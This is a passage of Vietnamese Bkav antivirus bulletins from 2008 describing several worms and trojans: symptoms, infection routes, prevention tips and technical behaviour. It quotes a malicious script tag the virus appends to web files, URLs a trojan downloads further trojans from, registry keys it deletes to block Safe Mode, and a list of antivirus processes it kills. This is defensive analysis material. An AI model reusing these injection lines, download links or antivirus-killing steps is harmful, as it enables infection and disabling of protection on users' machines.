Mất checkbox để hiển thị các file hệ thống.. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng
Trang 1o yassistse
Dừng các process của các chương trình :
o VsTskMgr.exe
o naPrdMgr.exe
o UpdaterUI.exe
o TBMon.exe
o scan32.exe
o Ravmond.exe
o CCenter.exe
o RavTask.exe
o Rav.exe
o Ravmon.exe
o RavmonD.exe
o RavStub.exe
o KVXP.kxp
o KvMonXP.kxp
o KVCenter.kxp
o KVSrvXP.exe
o KRegEx.exe
o UIHost.exe
o TrojDie.kxp
o FrogAgent.exe
o Logo1_.exe
o Logo_1.exe
o Rundl123.exe
Tạo file Desktop_.ini ghi lại ngày giờ virus được kích hoạt lần đầu tiên vào tất cả các thư mục
Chuyên viên phân tích: Tô Đình Hiệp
Một số malware đáng chú ý cập nhật cùng ngày: W32.FakeAntiDKX.Adware,
W32.FakeBRA.Adware, W32.FakeBRB.Adware, W32.FakeLXUA.Adware, W32.KavoDGXY.Worm, W32.SecretDVB.Worm, W32.SillyPF.Worm,
W32.MpconZX.Trojan, W32.VserverZX.Trojan, W32.FialaKE.Worm
Bkav2025 - Phát hành lần thứ 1 ngày 29/11/2008, cập nhật
NTRootI, RejanH, KavoFGS, DashferML, XPackK
Malware cập nhật mới nhất:
Trang 2 Tên malware: W32 DashferML.PE
Thuộc họ: W32.Dashfer.PE
Loại: PE
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 28/11/2008
Kích thước: 165Kb
Mức độ phá hoại: Cao
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Không vào được chế độ safe mode của Windows
Xuất hiện popup các trang web tiếng Trung Quốc
Mất checkbox để hiển thị các file hệ thống
Cách thức lây nhiễm:
Phát tán qua trang web
Tự động lây nhiễm qua USB
Lây qua các file thực thi
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa
Mô tả kỹ thuật:
Xóa các key :
HKLM\ \Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\ \Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
làm cho máy tính không khởi động được trong chế độ safemode
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và
~.exe vào thư mục Startup
để virus được thực thi khi khởi đông hệ thống
Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy
Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\Drivers\Alg.exe
Sửa key làm mất checkbox để hiển thị các file hệ thống
Trang 3 Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa
Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard
Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén rar) đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống
Chuyên viên phân tích : Nguyễn Ngọc Dũng
Bkav2038 (05/12/2008) cập nhật lần thứ 1: Cryptic, VtLikeAA
Malware cập nhật mới nhất:
Tên malware: W32.AmvoDYBA.Worm
Thuộc họ: W32.Amvo.Worm
Loại: Worm
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 04/12/2008
Kích thước:108Kb
Mức độ phá hoại: Cao
Nguy cơ:
Ăn cắp thông tin cá nhân
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Thay đổi registry
Cách thức lây nhiễm:
Tự động lây nhiễm vào USB
Phát tán qua các trang web độc hại
Cách phòng tránh:
Không nên mở các ổ USB mới chưa được quét virus bằng cách nháy kép vào
ổ đĩa
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Mô tả kỹ thuật:
Copy chính nó thành các file sau:
o %Sysdir%\\amvo.exe
Tạo các file sau:
o %Userdir%\Local Settings\Temp\9sky8pia.dll
Trang 4o %Userdir%\Local Settings\Temp\4.sys
o %Userdir%\Local Settings\Temp\help.exe
o %Sysdir%\amvo0.dll
Ghi key sau để tự động kích hoạt virus khi khởi động máy tính:
o HKCU\Software\Microsoft\Windows\CurrentVersion\Run\amva
Tìm các ổ đĩa cứng, usb và copy chính nó thành file qwc.exe, ghi thêm file autorun.inf để virus lây lan
Chuyên viên phân tích: Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày: W32.SpyOnlineF.Trojan,
W32.Wikservice.Trojan, W32.AntiV2009.Adware, W32.OngameC1AA.Trojan, W32.MmvoPNM.Worm, W32.LibLoader.PE, W32.Xiny.PE,
W32.KamsoftRC.Worm, W32.Rs32netTB.Trojan, W32.Anti08BH.Worm,
W32.Detxel.Trojan
Bkav2045 - Phát hành lần thứ 2 ngày 09/12/2008, cập nhật
SysManA, Themiser, XpShellA, FakeUserAA, SecretAAB
Malware cập nhật mới nhất:
Tên malware: W32.FakeUserAA.Trojan
Thuộc họ: W32.FakeUser.Trojan
Loại: Trojan
Xuất xứ: Nước ngoài
Ngày phát hiện mẫu: 09/12/2008
Kích thước: 24Kb
Mức độ phá hoại: Cao
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Cách thức lây nhiễm:
Phát tán qua trang web
Do trojan khác download về
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Mô tả kỹ thuật:
Trang 5 Ghi đè virus lên file userinit.exe của Windows để virus được kích hoạt mỗi khi Win khởi động
Tạo mutex : MICK_DOWNLOAD_MUTEX để chỉ 1 trojan cùng loại chạy trên 1 máy
Download dk.txt từ đường link : http://www.d[removed]tdt.net/dk.txt
File này chứa rất nhiều link download các trojan khác :
http://png1.gacxz.net/soft0.exe
http://png1.gacxz.net/soft1.exe
http://png1.gacxz.net/soft33.exe
Chuyên viên phân tích : Nguyễn Công Cường
Bkav2050 - Phát hành lần thứ 1 ngày 11/12/2008, cập nhật
DrDevic, FialaLC, LogoOneKC, VbsSowar, SecretRockD
Malware cập nhật mới nhất:
Tên malware: W32.FialaLC.Worm
Thuộc họ: W32.Fiala.Worm
Loại: Worm
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 11/12/2008
Kích thước: 15Kb
Mức độ phá hoại: Cao
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Bị ăn cắp mật khẩu tài khoản Game Online